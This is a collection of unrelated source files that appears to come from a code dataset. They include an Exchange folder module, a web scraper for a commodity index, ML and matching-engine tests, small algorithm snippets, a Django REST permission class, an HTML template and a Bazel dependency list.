RecoverableItemsVersions,
SearchFolders,
SentItems,
ServerFailures,
SyncIssues,
Tasks,
ToDoSearch,
VoiceMail,
]
@property
def tois(self):
# 'Top of Information Store' is a folder available in some Exchange accounts. It usually contains the
# distinguished folders belonging to the account (inbox, calendar, trash etc.).
return self.get_default_folder(MsgFolderRoot)
def get_default_folder(self, folder_cls):
try:
return super(Root, self).get_default_folder(folder_cls)
except ErrorFolderNotFound:
pass
# Try to pick a suitable default folder. we do this by:
# 1. Searching the full folder list for a folder with the distinguished folder name
# 2. Searching TOIS for a direct child folder of the same type that is marked as distinguished
# 3. Searching TOIS for a direct child folder of the same type that is has a localized name
# 4. Searching root for a direct child folder of the same type that is marked as distinguished
# 5. Searching root for a direct child folder of the same type that is has a localized name
log.debug('Searching default %s folder in full folder list', folder_cls)
for f in self._folders_map.values():
# Require exact class to not match e.g. RecipientCache instead of Contacts
if f.__class__ == folder_cls and f.has_distinguished_name:
log.debug('Found cached %s folder with default distinguished name', folder_cls)
return f
# Try direct children of TOIS first. TOIS might not exist.
try:
return self._get_candidate(folder_cls=folder_cls, folder_coll=self.tois.children)
except ErrorFolderNotFound:
# No candidates, or TOIS does ot exist
pass
# No candidates in TOIS. Try direct children of root.
return self._get_candidate(folder_cls=folder_cls, folder_coll=self.children)
def _get_candidate(self, folder_cls, folder_coll):
# Get a single the folder of the same type in folder_coll
same_type = [f for f in folder_coll if f.__class__ == folder_cls]
are_distinguished = [f for f in same_type if f.is_distinguished]
if are_distinguished:
candidates = are_distinguished
else:
candidates = [f for f in same_type if f.name.lower() in folder_cls.localized_names(self.account.locale)]
if candidates:
if len(candidates) > 1:
raise ValueError(
'Multiple possible default %s folders: %s' % (folder_cls, [text_type(f.name) for f in candidates])
)
if candidates[0].is_distinguished:
log.debug('Found cached distinguished %s folder', folder_cls)
else:
log.debug('Found cached %s folder with localized name', folder_cls)
return candidates[0]
raise ErrorFolderNotFound('No useable default %s folders' % folder_cls)
class PublicFoldersRoot(RootOfHierarchy):
DISTINGUISHED_FOLDER_ID = 'publicfoldersroot'
TRAVERSAL_DEPTH = SHALLOW
supported_from = EXCHANGE_2007_SP1
def get_children(self, folder):
# EWS does not allow deep traversal of public folders, so self._folders_map will only populate the top-level
# subfolders. To traverse public folders at arbitrary depth, we need to get child folders on demand.
# Let's check if this folder already has any cached children. If so, assume we can just return those.
children = list(super(PublicFoldersRoot, self).get_children(folder=folder))
if children:
# Return a generator like our parent does
for f in children:
yield f
return
# Also return early if the server told us that there are no child folders.
if folder.child_folder_count == 0:
return
children_map = {}
try:
for f in FolderCollection(account=self.account, folders=[folder]).find_folders(depth=self.TRAVERSAL_DEPTH):
if isinstance(f, Exception):
raise f
children_map[f.id] = f
except ErrorAccessDenied:
# No access to this folder
pass
# Let's update the cache atomically, to avoid partial reads of the cache.
self._subfolders.update(children_map)
# Child folders have been cached now. Try super().get_children() again.
for f in super(PublicFoldersRoot, self).get_children(folder=folder):
yield f
class ArchiveRoot(RootOfHierarchy):
DISTINGUISHED_FOLDER_ID = 'archiveroot'
supported_from = EXCHANGE_2010_SP1
WELLKNOWN_FOLDERS = [
ArchiveDeletedItems,
ArchiveInbox,
ArchiveMsgFolderRoot,
ArchiveRecoverableItemsDeletions,
ArchiveRecoverableItemsPurges,
ArchiveRecoverableItemsRoot,
ArchiveRecoverableItemsVersions,
]
# Folders that return 'ErrorDeleteDistinguishedFolder' when we try to delete them. I can't find any official docs
# listing these folders.
NON_DELETEABLE_FOLDERS = [
AllContacts,
AllItems,
CalendarLogging,
CommonViews,
ConversationSettings,
DeferredAction,
ExchangeSyncData,
FreebusyData,
Friends,
GALContacts,
Location,
MailboxAssociations,
MyContactsExtended,
ParkedMessages,
Reminders,
RSSFeeds,
Schedule,
Sharing,
Shortcuts,
SpoolerQueue,
System,
TemporarySaves,
Views,
WorkingSet,
]
|
py | b403424f747f410612c42a078a34b18c4322e758 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2022/2/4 17:17
Desc: 义乌小商品指数
http://www.ywindex.com/Home/Product/index/
"""
import pandas as pd
import requests
from bs4 import BeautifulSoup
def index_yw(symbol: str = "月景气指数") -> pd.DataFrame:
"""
义乌小商品指数
http://www.ywindex.com/Home/Product/index/
:param symbol: choice of {"周价格指数", "月价格指数", "月景气指数"}
:type symbol: str
:return: 指数结果
:rtype: pandas.DataFrame
"""
name_num_dict = {
"周价格指数": 1,
"月价格指数": 3,
"月景气指数": 5,
}
url = "http://www.ywindex.com/Home/Product/index/"
res = requests.get(url)
soup = BeautifulSoup(res.text, "lxml")
table_name = (
soup.find_all(attrs={"class": "tablex"})[name_num_dict[symbol]]
.get_text()
.split("\n\n\n\n\n")[2]
.split("\n")
)
table_content = (
soup.find_all(attrs={"class": "tablex"})[name_num_dict[symbol]]
.get_text()
.split("\n\n\n\n\n")[3]
.split("\n\n")
)
if symbol == "月景气指数":
table_df = pd.DataFrame([item.split("\n") for item in table_content]).iloc[
:, :5
]
table_df.columns = ['期数', '景气指数', '规模指数', '效益指数', '市场信心指数']
table_df['期数'] = pd.to_datetime(table_df['期数']).dt.date
table_df['景气指数'] = pd.to_numeric(table_df['景气指数'])
table_df['规模指数'] = pd.to_numeric(table_df['规模指数'])
table_df['效益指数'] = pd.to_numeric(table_df['效益指数'])
table_df['市场信心指数'] = pd.to_numeric(table_df['市场信心指数'])
return table_df
elif symbol == "周价格指数":
table_df = pd.DataFrame([item.split("\n") for item in table_content]).iloc[:, :6]
table_df.columns = table_name
table_df['期数'] = pd.to_datetime(table_df['期数']).dt.date
table_df['价格指数'] = pd.to_numeric(table_df['价格指数'])
table_df['场内价格指数'] = pd.to_numeric(table_df['场内价格指数'])
table_df['网上价格指数'] = pd.to_numeric(table_df['网上价格指数'])
table_df['订单价格指数'] = pd.to_numeric(table_df['订单价格指数'])
table_df['出口价格指数'] = pd.to_numeric(table_df['出口价格指数'])
return table_df
elif symbol == "月价格指数":
table_df = pd.DataFrame([item.split("\n") for item in table_content]).iloc[:, :6]
table_df.columns = table_name
table_df['期数'] = pd.to_datetime(table_df['期数']).dt.date
table_df['价格指数'] = pd.to_numeric(table_df['价格指数'])
table_df['场内价格指数'] = pd.to_numeric(table_df['场内价格指数'])
table_df['网上价格指数'] = pd.to_numeric(table_df['网上价格指数'])
table_df['订单价格指数'] = pd.to_numeric(table_df['订单价格指数'])
table_df['出口价格指数'] = pd.to_numeric(table_df['出口价格指数'])
return table_df
if __name__ == "__main__":
index_yw_df = index_yw(symbol="周价格指数")
print(index_yw_df)
index_yw_df = index_yw(symbol="月价格指数")
print(index_yw_df)
index_yw_df = index_yw(symbol="月景气指数")
print(index_yw_df)
|
py | b403426abb66243ae6bd2e7a295d5e6c43fc4048 | # Source : https://www.hackerearth.com/practice/machine-learning/data-manipulation-visualisation-r-python/tutorial-data-manipulation-numpy-pandas-python/tutorial/?utm_campaign=&utm_medium=email&utm_source=miscellaneous
# predict if the salary of a given person is less than or more than 50K.
import pandas as pd
from sklearn import preprocessing
# load training data
train = pd.read_csv("../../data/train.csv")
# load test data
test = pd.read_csv("../../data/test.csv")
#check data set
train.info()
print ("The train data has",train.shape)
print ("The test data has",test.shape)
train.head()
# Checking for missing values
nans = train.shape[0] - train.dropna().shape[0]
print ("%d rows have missing values in the train data" %nans)
nand = test.shape[0] - test.dropna().shape[0]
print ("%d rows have missing values in the test data" %nand)
# which columns have missing values
print train.isnull().sum()
# Let's count the number of unique values from character variables
cat = train.select_dtypes(include=['O'])
cat.apply(pd.Series.nunique)
#Education
train.workclass.value_counts(sort=True)
train.workclass.fillna('Private',inplace=True)
#Occupation
train.occupation.value_counts(sort=True)
train.occupation.fillna('Prof-specialty',inplace=True)
#Native Country
train['native.country'].value_counts(sort=True)
train['native.country'].fillna('United-States',inplace=True)
print train.isnull().sum()
#check proportion of target variable
train.target.value_counts()/train.shape[0]
crosstab = pd.crosstab(train.education, train.target,margins=True)/train.shape[0]
print crosstab
#load sklearn and encode all object type variables
from sklearn import preprocessing
for x in train.columns:
if train[x].dtype == 'object':
lbl = preprocessing.LabelEncoder()
lbl.fit(list(train[x].values))
train[x] = lbl.transform(list(train[x].values))
print train.head()
|
py | b40343a1108136dc58ca65b0e6722aa81c3ad08a |
referents = [] # list "object descriptor -> python object"
freelist = None
def store(x):
"Store the object 'x' and returns a new object descriptor for it."
global freelist
p = freelist
if p is None:
p = len(referents)
referents.append(x)
else:
freelist = referents[p]
referents[p] = x
return p
def discard(p):
"""Discard (i.e. close) the object descriptor 'p'.
Return the original object that was attached to 'p'."""
global freelist
x = referents[p]
referents[p] = freelist
freelist = p
return x
class Ref(object):
"""For use in 'with Ref(x) as ob': open an object descriptor
and returns it in 'ob', and close it automatically when the
'with' statement finishes."""
def __init__(self, x):
self.x = x
def __enter__(self):
self.p = p = store(self.x)
return p
def __exit__(self, *args):
discard(self.p)
def count_pyobj_alive():
result = len(referents)
p = freelist
while p is not None:
assert result > 0
result -= 1
p = referents[p]
return result
# ------------------------------------------------------------
if __name__ == '__main__':
import api
ffi = api.PythonFFI()
ffi.cdef("""
typedef int pyobj_t;
int sum_integers(pyobj_t p_list);
pyobj_t sum_objects(pyobj_t p_list, pyobj_t p_initial);
""")
@ffi.pyexport("int(pyobj_t)")
def length(p_list):
list = referents[p_list]
return len(list)
@ffi.pyexport("int(pyobj_t, int)")
def getitem(p_list, index):
list = referents[p_list]
return list[index]
@ffi.pyexport("pyobj_t(pyobj_t)")
def pyobj_dup(p):
return store(referents[p])
@ffi.pyexport("void(pyobj_t)")
def pyobj_close(p):
discard(p)
@ffi.pyexport("pyobj_t(pyobj_t, int)")
def pyobj_getitem(p_list, index):
list = referents[p_list]
return store(list[index])
@ffi.pyexport("pyobj_t(pyobj_t, pyobj_t)")
def pyobj_add(p1, p2):
return store(referents[p1] + referents[p2])
lib = ffi.verify("""
typedef int pyobj_t; /* an "object descriptor" number */
int sum_integers(pyobj_t p_list) {
/* this a demo function written in C, using the API
defined above: length() and getitem(). */
int i, result = 0;
int count = length(p_list);
for (i=0; i<count; i++) {
int n = getitem(p_list, i);
result += n;
}
return result;
}
pyobj_t sum_objects(pyobj_t p_list, pyobj_t p_initial) {
/* same as above, but keeps all additions as Python objects */
int i;
int count = length(p_list);
pyobj_t p1 = pyobj_dup(p_initial);
for (i=0; i<count; i++) {
pyobj_t p2 = pyobj_getitem(p_list, i);
pyobj_t p3 = pyobj_add(p1, p2);
pyobj_close(p2);
pyobj_close(p1);
p1 = p3;
}
return p1;
}
""")
with Ref([10, 20, 30, 40]) as p_list:
print lib.sum_integers(p_list)
with Ref(5) as p_initial:
result = discard(lib.sum_objects(p_list, p_initial))
print result
assert count_pyobj_alive() == 0
|
py | b40344e961895c0413b9d88b71525fe9e7be7d7d | import unittest
import numpy as np
from sklearn.datasets import load_iris
from sklearn.mixture import GaussianMixture, BayesianGaussianMixture
from skl2onnx import convert_sklearn
from skl2onnx.common.data_types import FloatTensorType
from skl2onnx.common.data_types import onnx_built_with_ml
from test_utils import dump_data_and_model, TARGET_OPSET
class TestGaussianMixtureConverter(unittest.TestCase):
def _fit_model_binary_classification(self, model, data, **kwargs):
X = data.data
y = data.target
mid_point = len(data.target_names) / 2
y[y < mid_point] = 0
y[y >= mid_point] = 1
model.fit(X, y)
return model, X.astype(np.float32)
def _fit_model_multiclass_classification(self, model, data):
X = data.data
y = data.target
model.fit(X, y)
return model, X.astype(np.float32)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_gaussian_mixture_binary_classification(self):
model, X = self._fit_model_binary_classification(
GaussianMixture(), load_iris())
model_onnx = convert_sklearn(
model,
"gaussian_mixture",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=TARGET_OPSET
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnBinGaussianMixture",
allow_failure="StrictVersion(onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_gaussian_bayesian_mixture_binary_classification(self):
model, X = self._fit_model_binary_classification(
BayesianGaussianMixture(), load_iris())
model_onnx = convert_sklearn(
model,
"gaussian_mixture",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=TARGET_OPSET
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnBinBayesianGaussianMixture",
allow_failure="StrictVersion(onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_gaussian_mixture_multiclass(self):
model, X = self._fit_model_multiclass_classification(
GaussianMixture(), load_iris())
model_onnx = convert_sklearn(
model,
"gaussian_mixture",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=TARGET_OPSET
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnMclGaussianMixture",
allow_failure="StrictVersion(onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_comp2(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2)
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_full(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2, covariance_type='full')
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2Full",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_tied(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2, covariance_type='tied')
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2Tied",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_diag(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2, covariance_type='diag')
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2Diag",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_spherical(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2, covariance_type='spherical')
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2Spherical",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
if __name__ == "__main__":
unittest.main()
|
py | b403450c789f2b6793eaaa75fb2a08b85f77fa1c | '''
project.permissions
===================
Project / Global Custom Permissions for REST API
'''
import logging
from rest_framework import permissions
logger = logging.getLogger('test_logger')
class IsAuthorOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
# Read permissions are allowed to any request
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the owner of the snippet
return obj.author == request.user
class IsAdminOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_permission(self, request, view): # Read permissions are allowed to any request
if request.method in permissions.SAFE_METHODS:
logger.info("%s" % request.method)
return True
# Write permissions are only allowed to the owner of the snippet
return request.user.is_staff or request.user.is_superuser
|
py | b4034571e8ba239f98358fad60d9d849e6bd9721 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import random
import time
from waterfall import waterfall_config
from google.appengine.api import memcache
_MEMCACHE_MASTER_DOWNLOAD_LOCK = 'master-download-lock-%s'
def WaitUntilDownloadAllowed(
master_name, timeout_seconds=90): # pragma: no cover
"""Waits until next download from the specified master is allowed.
Returns:
True if download is allowed to proceed.
False if download is not still allowed when the given timeout occurs.
"""
client = memcache.Client()
key = _MEMCACHE_MASTER_DOWNLOAD_LOCK % master_name
deadline = time.time() + timeout_seconds
download_interval_seconds = (
waterfall_config.GetDownloadBuildDataSettings().get(
'download_interval_seconds'))
memcache_master_download_expiration_seconds = (
waterfall_config.GetDownloadBuildDataSettings().get(
'memcache_master_download_expiration_seconds'))
while True:
info = client.gets(key)
if not info or time.time() - info['time'] >= download_interval_seconds:
new_info = {
'time': time.time()
}
if not info:
success = client.add(
key, new_info, time=memcache_master_download_expiration_seconds)
else:
success = client.cas(
key, new_info, time=memcache_master_download_expiration_seconds)
if success:
logging.info('Download from %s is allowed. Waited %s seconds.',
master_name, (time.time() + timeout_seconds - deadline))
return True
if time.time() > deadline:
logging.info('Download from %s is not allowed. Waited %s seconds.',
master_name, timeout_seconds)
return False
logging.info('Waiting to download from %s', master_name)
time.sleep(download_interval_seconds + random.random())
|
py | b40346a7cc60296c6fd257e8ac4e76f7eb2d1195 | '''
Author: ZHAO Zinan
Created: 07-Nov-2018
22. Generate Parenthesis
'''
class Solution:
def generateParenthesis(self, n):
"""
:type n: int
:rtype: List[str]
"""
self.list = []
self._generateParenthesis('', n, n, n)
return self.list
def _generateParenthesis(self, string, left, right, n):
if len(string) >= n*2:
self.list.append(string)
if left:
self._generateParenthesis(string+'(', left-1, right, n)
if right > left:
self._generateParenthesis(string+')', left, right-1, n)
# test
if __name__ == '__main__':
solution = Solution()
print(solution.generateParenthesis(3))
print(len(solution.generateParenthesis(4))) # 14
|
py | b40347144bbf96e51f47d3fea7d32fe1ddab9947 | def primes_oneliner(N):
aux = {}
return [aux.setdefault(p, p) for p in range(2, N)
if 0 not in [p%d for d in aux if p>=d+d]]
|
py | b403473f9950720befffe46bd9e50aa43acba90b | from python.src.matching_engine import MatchingEngine
from python.src.order_book import OrderBook
from python.src.orders import LimitOrder
from python.src.orders import MarketOrder
from python.src.enums import OrderDirection
from python.src.enums import OrderDirection
from python.src.enums import OrderStatus
from python.src.exceptions import InvalidOrderDirectionException
import pytest
def test_matching_engine_init():
matching_engine = MatchingEngine()
assert not matching_engine.order_books, "Test Failed: order_books should be empty"
assert not matching_engine.orders, "Test Failed: orders should be empty"
assert not matching_engine.processed_orders, "Test Failed: processed_orders should be empty"
pass
def test_matching_engine_can_match():
instrument_id = "AAPL"
quantity = 100
price = 10
limit_orders = [LimitOrder(instrument_id=instrument_id,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders:
matching_engine.add_order(order)
matching_engine.match()
order_book = matching_engine.order_books[instrument_id]
assert len(
matching_engine.order_books) == 1, "Test Failed: There should be 1 order book"
assert not matching_engine.orders, "Test Failed: There should be no orders"
assert len(
matching_engine.processed_orders) == 10, "Test Failed: There should be 10 processed_orders"
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
pass
def test_matching_engine_can_add_orders():
instrument_id = "AAPL"
quantity = 100
price = 10
limit_orders = [LimitOrder(instrument_id=instrument_id,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders:
matching_engine.add_order(order)
assert not matching_engine.order_books, "Test Failed: There should beno order books"
assert matching_engine.orders, "Test Failed: There should be orders"
assert len(
matching_engine.orders) == 10, "Test Failed: There should be 10 orders"
assert not matching_engine.processed_orders, "Test Failed: There should be no processed_orders"
pass
def test_matching_engine_can_add_and_process():
instrument_id = "AAPL"
quantity = 100
price = 10
limit_orders = [LimitOrder(instrument_id=instrument_id,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders:
matching_engine.add_order(order)
matching_engine.match()
order_book = matching_engine.order_books[instrument_id]
assert len(
matching_engine.order_books) == 1, "Test Failed: There should be 1 order book"
assert not matching_engine.orders, "Test Failed: There should be no orders"
assert len(
matching_engine.processed_orders) == 10, "Test Failed: There should be 10 processed_orders"
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
pass
def test_matching_engine_can_add_and_match_multiple_instruments():
instrument_id_1 = "AAPL"
instrument_id_2 = "MSFT"
quantity = 100
price = 10
limit_orders_1 = [LimitOrder(instrument_id=instrument_id_1,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
limit_orders_2 = [LimitOrder(instrument_id=instrument_id_2,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders_1 + limit_orders_2:
matching_engine.add_order(order)
matching_engine.match()
order_book = matching_engine.order_books[instrument_id_1]
assert len(
matching_engine.order_books) == 2, "Test Failed: There should be 2 order books"
assert not matching_engine.orders, "Test Failed: There should be no orders"
assert len(
matching_engine.processed_orders) == 20, "Test Failed: There should be 20 processed_orders"
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
order_book = matching_engine.order_books[instrument_id_2]
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
pass
def test_matching_engine_can_add_and_run_multiple_instruments():
instrument_id_1 = "AAPL"
instrument_id_2 = "MSFT"
quantity = 100
price = 10
limit_orders_1 = [LimitOrder(instrument_id=instrument_id_1,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
limit_orders_2 = [LimitOrder(instrument_id=instrument_id_2,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders_1 + limit_orders_2:
matching_engine.add_order(order)
matching_engine.run()
matching_engine.live = False
order_book = matching_engine.order_books[instrument_id_1]
assert len(
matching_engine.order_books) == 2, "Test Failed: There should be 2 order books"
assert not matching_engine.orders, "Test Failed: There should be no orders"
assert len(
matching_engine.processed_orders) == 20, "Test Failed: There should be 20 processed_orders"
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
order_book = matching_engine.order_books[instrument_id_2]
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
pass
|
py | b40347ae71edc448aa9436f94c335b5c930ed2a3 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.9.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.apps_v1beta1_deployment_list import AppsV1beta1DeploymentList
class TestAppsV1beta1DeploymentList(unittest.TestCase):
""" AppsV1beta1DeploymentList unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testAppsV1beta1DeploymentList(self):
"""
Test AppsV1beta1DeploymentList
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.apps_v1beta1_deployment_list.AppsV1beta1DeploymentList()
pass
if __name__ == '__main__':
unittest.main()
|
py | b40347e30f2825a41bff1a8df0da1d8958671a4d | # Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
TEMPLATE_START = """\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
html {
font-family: Arial,Helvetica,sans-serif;
background-color: white;
color: black;
}
table {
border-collapse: collapse;
empty-cells: show;
margin: 1em 0em;
border: 1px solid black;
}
th, td {
border: 1px solid black;
padding: 0.1em 0.2em;
height: 1.5em;
width: 12em;
}
td.colspan4, th.colspan4 {
width: 48em;
}
td.colspan3, th.colspan3 {
width: 36em;
}
td.colspan2, th.colspan2 {
width: 24em;
}
th {
background-color: rgb(192, 192, 192);
color: black;
height: 1.7em;
font-weight: bold;
text-align: center;
letter-spacing: 0.1em;
}
td.name {
background-color: rgb(240, 240, 240);
letter-spacing: 0.1em;
}
td.name, th.name {
width: 10em;
}
</style>
<title>%(NAME)s</title>
</head>
<body>
<h1>%(NAME)s</h1>
"""
TEMPLATE_END = """</body>
</html>
"""
|
bzl | b4034884fab059c132d374b36e46dda27f742b3f | load("//:import_external.bzl", import_external = "safe_wix_scala_maven_import_external")
def dependencies():
import_external(
name = "org_ow2_asm_asm_analysis",
artifact = "org.ow2.asm:asm-analysis:6.2.1",
artifact_sha256 = "4c9342c98e746e9c2d7f2cdc6896f7348317e9b1e5a6c591047fc8969def4b23",
srcjar_sha256 = "389c433efbf54b9c28416d68e763fd99dafe99b2469982d0aceb180b012ac2d9",
deps = [
"@org_ow2_asm_asm_tree"
],
)
import_external(
name = "org_ow2_asm_asm_tree",
artifact = "org.ow2.asm:asm-tree:6.2.1",
artifact_sha256 = "a520b54c7be4e07e533db8420ddf936fe8341ff56a5df255bab584478dd90aab",
srcjar_sha256 = "549a8d0825a18c4ccfe4a1cb78cb3b4105ce6f869646ef039f9a21077e18f619",
deps = [
"@org_ow2_asm_asm"
],
)
import_external(
name = "org_ow2_asm_asm_util",
artifact = "org.ow2.asm:asm-util:5.0.3",
artifact_sha256 = "2768edbfa2681b5077f08151de586a6d66b916703cda3ab297e58b41ae8f2362",
srcjar_sha256 = "1e9ee309d909b3dbf33291fcfd36c76adba4ed1215b8156c3ac61a774cc86bf1",
deps = [
"@org_ow2_asm_asm_tree"
],
)
import_external(
